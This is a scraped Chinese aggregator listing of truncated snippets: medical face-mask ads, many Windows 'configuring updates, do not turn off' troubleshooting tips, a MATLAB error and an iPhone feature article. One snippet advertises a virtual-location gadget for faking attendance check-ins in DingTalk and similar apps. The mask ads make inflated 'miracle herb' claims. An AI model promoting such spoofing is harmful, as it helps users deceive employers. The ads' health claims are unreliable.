    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/4 23:55:16
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/4 23:55:01
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57